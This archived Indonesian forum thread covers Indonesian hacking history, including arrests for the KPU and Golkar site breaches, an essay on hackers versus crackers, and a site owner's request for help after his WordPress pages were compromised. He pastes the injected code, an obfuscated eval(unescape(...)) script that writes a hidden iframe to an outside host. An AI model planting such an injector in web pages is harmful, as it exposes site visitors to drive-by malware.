PDA

View Full Version : Sejarah Hacking Di Indonesia dan Pelakunya



bento
11-01-2010, 02:30 AM
Pergantian abad ke 20 merupakan masa ke emasan di dunia bawah tanah Internet Indonesia. Perkembangan komunitas hacker marak di Indonesia. Beberapa kelompok hacker legendaris Indonesia bermunculan, seperti, hackerlink, anti-hackerlink, kecoa elektronik, echo dan saat ini kelompok terbesar di Indonesia dengan anggota lebih dari 13700 orang adalah jasakom yang bermarkas di To view links or images in this forum your post count must be 10 or greater. You currently have 0 posts. .

Selain carding dan mencuri di Internet ada banyak sekali sisi positif dari perkembangan teknologi komunitas hacker Indonesia, khususnya yang berkaitan dengan teknologi keamanan jaringan.

Dari kelompok-kelompok hacker ini, beberapa tokoh dan ahli keamanan jaringan Internet Indonesia bermunculan. Nama S'to, Xnuxer, y3dips, Jim Geovedi menjadi legendaris di dunia bawah tanah Indonesia di tahun 2004-2006.

5 best hacker di indonesia

S’to http://jasakom.com/sto/
Xnuxer http://xnuxer.or.id/
Jim Geovedi http://jim.geovedi.com/
Irvan http://irvan.or.id/
Y3dips http://y3dips.echo.or.id/

Juli 2000 hC- di adili di Singapura

Di era keemasan para hacker sekitar tahun 1999-2000, kelompok hacker legendaris Indonesia adalah Antihackerlink. Puluhan situs di Internet, lokal maupun luar negeri, pernah diobok-obok oleh kelompok ini. Wenas Agusetiawan, yang kerap menggunakan nickname hC- (hantu Crew) kalau sedang melakukan chatting dan juga pendiri kelompok ini, bahkan belum berusia 17 tahun ketika pada pertengahan 2000 dirinya tertangkap basah oleh kepolisian Singapura, ketika tengah melakukan hacking ke sebuah jaringam komputer di Singapura melalui apartemennya di daerah Toa Payoh - Singapura.

hC menjadi hacker Pertama Indonesia yang di adili. hC termasuk hacker pandai dari Indonesia pada saat usia SMP telah berhasil menyusup ke berbagai jaringan di Indonesia.

hC asal Malang, Jawa Timur, pada tanggal 20 Juli 2000 mulai diadili oleh Peradilan Anak di Singapura. hC didakwa melakukan kejahatan cyber dengan menembus salah satu jaringan yang ada di Singapura. Di Singapura, hC tidak bisa lolos dari jeratan hukum karena negara kecil itu telah memberlakukan undang-undang teknologi informasi sejak 1986.

Beruntunglah hC, sebab dia belum mencapai usia 17 tahun saat proses pengadilannya berlangsung, sehingga dia hanya dikenakan pengadilan di bawah umur dan hanya dikenakan denda Rp 150 juta saja! Jika saja pengadilannya ditunda 1 minggu saja, maka genap sudah dia berusia 17 tahun, dan penjara telah siap menerimanya. Berdasarkan Bukti Acara Pemeriksaan (BAP) Kepolisian Singapura, Wenas ternyata banyak belajar dan termotivasi melakukan hacking melalui chatroom.

24 April 2004 Xnuxer ditangkap

XNUXER aka SCHIZOPRENIC(rip@2003), nama panggilan Dani Firman Syah di dunia bawah tanah, pada hari Rabu tanggal 21 April 2004 jam 14.30 WIB di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya dan resmi di tahan pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta.
[edit] Membobol Situs TNP-KPU

Hari Kamis 15 April 2004 XNUXER menemukan lubang sekuriti di situs TNP-KPU dengan melakukan tes terhadap sistem sekuriti di situs tnp.kpu.go.id dengan menggunakan teknik XSS (cross site scripting) dari IP 202.158.10.117. Tanggal 16 April 2004 hari Jumat, XNUXER menginformasikan adanya lubang sekuriti di situs TNP-KPU ke milis jasakom-perjuangan@yahoogroups ketika menjawab pertanyaan dari skipper tentang adanya bug XSS di Yahoo!. XNUXER melaporkan bug yang ada di situs TNP-KPU memiliki risk security dengan level low (website KPU belum tembus atau tidak rusak).

Sabtu 17 April 2004 pukul 03.12,42, situs TNP-KPU berhasil di tembus dengan cara SQL Injection, akibatnya situs TNP-KPU ter-update daftar nama partainya dengan nama-nama partai lucu yang terjadi pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang di gunakan oleh XNUXER dalam meng-hack yakni dengan melakukan anonymity dengan menggunakan web proxy. XNUXER pada saat itu melakukan serangan di ketahui dari IP 202.158.10.117. Di ketahui serangan di lakukan dengan menggunakan IP Proxy Anonymous Thailand 208.147.1.1.

Beruntung XNUXER meng-hack situs KPU hanya karena ingin mengetes keamanan sistem komputer/server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat XNUXER yang sangat kooperatif, akhirnya karena tindakannya XNUXER di bui selama 6 bulan 21 hari.


1 Agustus 2006, Iqra Syafaat di tangkap

Pada 17 Juli 2006, DPP Partai Golkar melaporkan terjadinya serangan pengrusakan terhadap situs Golkar.or.id. Serangan terhadap situs partai berlambang pohon beringin itu terjadi pada 9 hingga 13 Juli 2006 hingga menyebabkan tampilan halaman berubah (deface). "Pada 9 Juli 2006, tersangka mengganti tokoh Partai Golkar yang termuat dalam situs dengan gambar gorilla putih tersenyum dan di bagian bawah halaman dipasangi gambar artis Hollywood yang seronok, dengan tulisan 'Bersatu untuk malu' " kata Kadit Cyber Crime Bareskrim Mabes Polri Kombes Pol Petrus Golose.

Setelah melakukan serangan terhadap situs GOLKAR To view links or images in this forum your post count must be 10 or greater. You currently have 0 posts. sebanyak 1257 kali, Polisi akhirnya menangkap Iqra Syafaat a.k.a Nogra pada tanggal 1 Agustus 2006.

"Dari nomor IP address yang ditelusuri Polri, ia berhubungan dengan hacker asing dari Malaysia, Amerika, Brasil, Turki dan Rumania," ungkap, Jalan Trunojoyo, Jakarta, Senin (7/8/2006).

Kadit Cyber Crime Bareskrim Mabes Polri Kombes Pol Petrus Golose di Mabes Polri pada hari senin 7/8/2006 mengungkapkan bahwa Iqra melakukan serangan dari IP address 222.129.136.52, 222.129.136.81, dan 222.129.136.101 yang diketahui milik PT Inforsys Indonesia di Batam, yang di gunakan oleh Warnet Balerang, Jalan Raden Fatah Nomor 81, Batam. Selain itu Iqra juga menyerang situs Golkar dari alamat rumahnya di Bukit Timur, Tanjung Uma, Batam.

Menurut Petrus Golose, Iqra dikenai pasal 50 juncto pasal 22 huruf c, UU nomor 36 tahun 1999 tentang Telekomunikasi, dan pasal 406 KUHP dengan ancaman hukuman 6 tahun penjara.

Komunitas Underground Indonesia 2006
Catatan: Onno W. Purbo 04/2006

Name Members Berdiri
jasakom-perjuangan 12278 28 February 2003
newbie-hacker 5636 11 Juli 2003
majalahneotek 5633 19 Juli 2000
vaksin 3388 1 Des 2000
yogyafree 2251 25 April 2005
indocrack 1175 12 February 2005
bandunghack 1046 9 Agustus 2004

source : I.H.T (Indonesian Hacker Team)

Na2nk
11-01-2010, 03:27 AM
Milu moco hulung lék...... :-B

yo2k
11-01-2010, 12:05 PM
milu takon isun man banksonk, paran bedane hacker ambi cracker. isun kari hing mudeng ambi dunia ikih yah. enake paran sih dadi ngunu ikau ?? :salaman:

bento
11-01-2010, 03:46 PM
milu takon isun man banksonk, paran bedane hacker ambi cracker. isun kari hing mudeng ambi dunia ikih yah. enake paran sih dadi ngunu ikau ?? :salaman:

kapan penafsiran isun dewek yah :

hacker : penyusup hang kapan wes berhasil mlebu, iku nguweni weruh nong hang duwe system (dadi hing ngerusak :) )
cracker : penyusup hang kapan wes berhasil mlebu, njuwut informasi trus ngerusak system/file/informasi hang ono ring system

ARTI HACKER
Ketika saya membaca sebuah tulisan tentang hacker dan cracker, beberapa hari yang lalu, saya tersadarkan akan kesalahan penafsiran saya pada dua istilah tersebut dalam dunia cyberspace. Awalnya saya beranggapan bahwa hacker adalah cracker itu sendiri. Atau sama-sama mengusung sebuah "penamaan" untuk membobol mekanisme dan kinerja komputer orang lain. Hal itu pula lah yang kemudian menggiring kesadaran saya untuk mencoba berselancar di dalam internet selama berjam-jam, mengeprin beberapa naskah yang berkaitan dengan itu dan mencoba berkomunikasi dengan orang lain dalam arena chating.

Satu pertanyaan yang saya ajukan pada mereka adalah, apa itu hacker? Dan tragisnya, apa yang mereka jawab hampir sama dengan apa yang saya miliki, yakni seorang hacker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan "mengacak-ngacak" dokumen didalamnya. Lalu apa itu cracker? Jawabannya pun nyaris sama. Intinya, baik hacker maupun cracker adalah para penyusup yang harus di waspadai keberadaanya. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.

Lalu, dimana letak kesalahan dari pendefinisian kedua istilah yang kerap hinggap ditelinga kita ini? Apalagi semenjak ada kabar bahwa "KPU-online" dibobol oleh para "hacker" beberapa bulan kebelakang. Benarkah itu adalah pekerjaan seorang hacker? Atau pekerjaan seorang cracker?

Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini.

PERSOALAN DASAR

Hacker dalam tulisan Eric Steven Raymond adalah " there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"

Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.

Lebih lanjut Raymon mengatakan " jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".

Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lin, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.

Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).

Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi " yang seharusnya makna itu diterapkan pada seorang cracker.

Sebut misalnya film the Net (1995), Take Down(1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.

Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.

Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untukmenyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat progranm komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahmi karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)

MENJADI HACKER

Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauhmana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?

Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.

Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.

Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.

Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.

AWAL SEBUAH PERJUANGAN

Ketika kita meniatkan diri untuk lebih akrab dengan dunia hacker, maka selain beberapa bekal yang disebutkan diatas, penguasaan bahasa pemrograman, html dan bahasa inggris, nampaknya niat tersebut harus juga dilengkapi dengan satu sikap mendasar tentang orientasi dan tujuan awal kita menjadi seorang hacker. Alih-alih menjadi seorang pakar pemrograman yang baik, jika tidak benar malah bisa terjebak pada prilaku negativ yang tidak hanya merugikan orang lain tapi merugikan diri sendiri. Konon, jika seandainya saja anda menjadi seorang cracker dan anda dikenal suka membuka rahasia orang lain, maka, jangan harap anda dapat dengan mudah berjalan-jalan kemanca negara. Karena, kata beberapa sumber, nama anda sudah di "black list" sebagai penjahat cyber?

Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kehawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.

source : http://myblogs.affiliatebot.com/chikmonk/431/arti_hacker/

yo2k
11-01-2010, 04:25 PM
kapan penafsiran isun dewek yah :

hacker : penyusup hang kapan wes berhasil mlebu, iku nguweni weruh nong hang duwe system (dadi hing ngerusak :) )
cracker : penyusup hang kapan wes berhasil mlebu, njuwut informasi trus ngerusak system/file/informasi hang ono ring system

ARTI HACKER
Ketika saya membaca sebuah tulisan tentang hacker dan cracker, beberapa hari yang lalu, saya tersadarkan akan kesalahan penafsiran saya pada dua istilah tersebut dalam dunia cyberspace. Awalnya saya beranggapan bahwa hacker adalah cracker itu sendiri. Atau sama-sama mengusung sebuah "penamaan" untuk membobol mekanisme dan kinerja komputer orang lain. Hal itu pula lah yang kemudian menggiring kesadaran saya untuk mencoba berselancar di dalam internet selama berjam-jam, mengeprin beberapa naskah yang berkaitan dengan itu dan mencoba berkomunikasi dengan orang lain dalam arena chating.

Satu pertanyaan yang saya ajukan pada mereka adalah, apa itu hacker? Dan tragisnya, apa yang mereka jawab hampir sama dengan apa yang saya miliki, yakni seorang hacker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan "mengacak-ngacak" dokumen didalamnya. Lalu apa itu cracker? Jawabannya pun nyaris sama. Intinya, baik hacker maupun cracker adalah para penyusup yang harus di waspadai keberadaanya. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.

Lalu, dimana letak kesalahan dari pendefinisian kedua istilah yang kerap hinggap ditelinga kita ini? Apalagi semenjak ada kabar bahwa "KPU-online" dibobol oleh para "hacker" beberapa bulan kebelakang. Benarkah itu adalah pekerjaan seorang hacker? Atau pekerjaan seorang cracker?

Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini.

PERSOALAN DASAR

Hacker dalam tulisan Eric Steven Raymond adalah " there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"

Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.

Lebih lanjut Raymon mengatakan " jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".

Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lin, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.

Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).

Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi " yang seharusnya makna itu diterapkan pada seorang cracker.

Sebut misalnya film the Net (1995), Take Down(1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.

Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.

Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untukmenyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat progranm komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahmi karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)

MENJADI HACKER

Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauhmana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?

Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.

Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.

Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.

Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.

AWAL SEBUAH PERJUANGAN

Ketika kita meniatkan diri untuk lebih akrab dengan dunia hacker, maka selain beberapa bekal yang disebutkan diatas, penguasaan bahasa pemrograman, html dan bahasa inggris, nampaknya niat tersebut harus juga dilengkapi dengan satu sikap mendasar tentang orientasi dan tujuan awal kita menjadi seorang hacker. Alih-alih menjadi seorang pakar pemrograman yang baik, jika tidak benar malah bisa terjebak pada prilaku negativ yang tidak hanya merugikan orang lain tapi merugikan diri sendiri. Konon, jika seandainya saja anda menjadi seorang cracker dan anda dikenal suka membuka rahasia orang lain, maka, jangan harap anda dapat dengan mudah berjalan-jalan kemanca negara. Karena, kata beberapa sumber, nama anda sudah di "black list" sebagai penjahat cyber?

Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kehawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.

source : http://myblogs.affiliatebot.com/chikmonk/431/arti_hacker/

riko hang endi man agus ??? __________________ :ngacir:

bento
11-01-2010, 04:37 PM
riko hang endi man agus ??? __________________ :ngacir:

tergantung relayne(atine) kang kapan pas apik yo apik kapan pas bludreg yo bludreg :))

sing tepat maneh tergantung kadar keimanan e... :hihi:

yo2k
11-04-2010, 03:47 PM
tergantung relayne(atine) kang kapan pas apik yo apik kapan pas bludreg yo bludreg :))

sing tepat maneh tergantung kadar keimanan e... :hihi:

mugo riko diweni keimanan hang lurus ambi hang kuwoso, makne hing mengguncang dunia persilatan :hihi:

bento
11-04-2010, 04:06 PM
mugo riko diweni keimanan hang lurus ambi hang kuwoso, makne hing mengguncang dunia persilatan :hihi:

huahahahha... koyok YOKO ae.. nak serial pendekar rajawali :hihi:

Who_I_ME
11-05-2010, 09:59 AM
tergantung relayne(atine) kang kapan pas apik yo apik kapan pas bludreg yo bludreg :))

sing tepat maneh tergantung kadar keimanan e... :hihi:

wech guaul.... ada kadar'e.... kadar kalorine piro kang????
terus kiro2 kolesterole sak mendi???

semoga jadi guru yang baik untuk murid muridnya... :D

yeye
11-13-2010, 10:21 AM
Seru-seru...
nais post, Mr. Kencrots :))

agudde'
11-15-2010, 04:55 PM
joss gandosh inpone kang....
mas Bento dewe kok gk di tulis ng dftar yoo???

$ Jim Geovedi DJ nyentrik n legend ancen (* yang pernah terang"an NANTANG Roy Suryo di sela presentasi di Al-azhar taon kemaren)...terbukti taon 2006 n 2008 dolo nde hitb ambi Raditya Iryandi,
$ y3dips... es gk kenek di omong wong kui, alh 1 perwakilan dr Indonesia di CTF hitb 2008 Malingsial.


lek pak Made kiro" mlebu dftar gk kang ????? hihi,

CMIIW n salam,
'-- '.... '--- '...-- '-.-- '.- '-. '-.-

bento
12-11-2010, 07:51 PM
paling tidak seperti inilah tampilan allnetwork.or.id dan allnetwork.org pada waktu itu..

http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1195.snc4/154746_1531806416944_1288282423_31168416_316507_n. jpg

tadi sore daped sms dari temen di lembah item kek gini...


a : kenek masalah soal allnet ndak sob?
bento : masalah hacking wingi a? aku durung oL kaet mabengi... emag enek kabar opo?
a : ney td b sampe diparani boody, anaknaga, page :)) aku buru oL awan mau... katae c yo kenek soale dia founder chan...wekwkewkekwek
bento : diparani nang ndi? chanel a? opo nak umah e?
a : nang warnet e di srengat la... habis itu si d sisan.. biz tu ndak tau kelanjutane...
bento : yo lek aku arep diparani yo kon marani nak banyuwangi... tak tukokne rujak soto khas banyuwangi :D
a : kwokwokwokwokwo... ra melu login.. cm nak chan lha lapo bingung..:D
bento : aku login nak database e tapi cm untup" tok..
a : gae peroksi ndak?
bento : ndak.. wingi sempat kepikiran see tp ndak sido.. :D yo lek diparani yo ditemoni.. mosok enek tamu ndak ditemoni..:D
a : posisie boody, anaknaga, page cm nyari orang yang drop db allnet sob.. si d sampe disuruh buad surat pernyataan bermaterai kalo ga drop db allnet..
...
...
...
...
lanjut oL pv si d

<bento> saman di parani sisan a?
<d> aku di drop wong 4
<d> sek tak ngasaran
<bento> sopoan?
<d> anu
<d> boody
<d> sing awake preketel preketel
<d> karo sopo kuwi
<d> lemu meneng
<d> sopo jenenge
<bento> anaknaga?
<d> gak eroh
<d> yo ora kenalan
<d> siji maneh
<d> sing lwemu
<bento> wekekeke
<d> aku wedi e
<d> ra iso ngomong
<d> mek meneng ae
<d> deke ngoceh ngoceh nyeneni aku
<bento> :D
<bento> diparani nak warnet?
<d> warnet
<bento> wiih keren niat tenanan
<d> aku koplok
<d> pucet tenanan
<bento> lha lek ncen ndak ngedrop ya wes
<d> iyuh
<d> tapi aku di seneni, mergo pas page ngoceh tak entahi
<bento> wkekalekakeawkleawkeawe


@allnetwork saia cm penggembira sadja gannn :)

menyoen
12-12-2010, 01:47 AM
^
^
kwari ngedheni...lare iki yuh

mikrotik89
12-22-2010, 11:34 PM
milu mantau...

be4rt
12-23-2010, 03:30 AM
laiyo blog isun heng isun kapak2aken rusak dewe terusan

be4rt
12-23-2010, 04:33 AM
cumak hang isun heran ngerti2 ko' ono script:

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%6 9%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D% 22%68%74%74%70%3A%2F%2F%69%73%65%79%68%2E%63%6F%6D %2F%3F%34%32%39%33%36%37%36%35%22%20%77%69%64%74%6 8%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66% 72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
padahal isun hen masang script iku ring kunu, moro2 ono digu byaen
hang manggon ring file index.html isun lan mageh ono maneh ceceran ring file php ring njero dan selalu manggon ring line terakhir.

soren jam 11,30 WIB mageh waras tp mulai bar jam 1 tgl 23-12-2010 woit cepet tenan brubahe, saiki rusak wes :))

ok untuk para master klendi iku lan tolong klendi solusine? ^:)^

bento
12-23-2010, 10:27 AM
boleh tau script versi lengkap e ndak pak Be?

http://i728.photobucket.com/albums/ww283/bebeklanang/beart.png

setelah saia akess webnya, ternyatah uda terlanjur diblokir sama google :D berarti di scirpt index nya kemungkinan ada spy yang bisa menyusup ke komputer lain... :D

mending bikin dari awal :D dan untuk ngembalikan biar ga ke bloking google keknya butuh waktu (kata masnawie kalo ga salah 3 bulan :D)

thanks
banksonk

be4rt
12-23-2010, 01:20 PM
scrip versi lengkap hang isun gae index ring be4rt.com cuma html biasa yg ternyata bareng isun petani isoh ketanaman scrip juga, dari diagnosa google webmaster tool:

http://photo.lareosing.org/image.php?id=9805_4D12D678&gif

kemudian file html isun rijiki ternyata script manggon ring line paling ngisor dewe di setiap dia script itu menempatkan diri.

cuma rodo bingunge bareng ngrijiki script iku ring file file php :( hun temokne ring default-widgets.php, pluggable.php dan masih banyak lagi

trus terakhir diagnosa file index bersih cuma bagian wordpress e hang nambah :(:

http://photo.lareosing.org/image.php?id=A74F_4D12D678&gif

hang isun takokne klendi nai di tumpuki maning scrip iku iso resik tah sing?

mohon solusi

bento
12-23-2010, 01:29 PM
paling aman jajal di backup disik ae database e... trus di coba replace ae wordpress e... (ato hanya cukup yang dicurigai di injeksi ajah yang di replace....)

kalo cm wordpress insyaAllah ga ada bugsnya... mungkin itu masuk dari thema ato mungkin lewat plugin... :)

untuk pengen tau apa aja yang mungkin rawan di bobol coba cek disini (http://1337db.com/)

thanks
banksonk

masnawie
12-23-2010, 01:32 PM
isuk mau wes tak omongi ngunu pak be, malah takok carane tumpukin piye..

tak kon ndeleh dipan trs buru tumpukono pak be :D

yo2k
12-23-2010, 01:33 PM
milu nyumbang link pak be, sope ngerti magih biso diubah utowo diilangi script2 ikau : http://ictfiles.com/column/2010/11/24/mengatasi_website_yang_terkena_malware_2

Dj_anchoex
10-17-2012, 11:58 AM
Milo moco dwolooor sedoyo!!!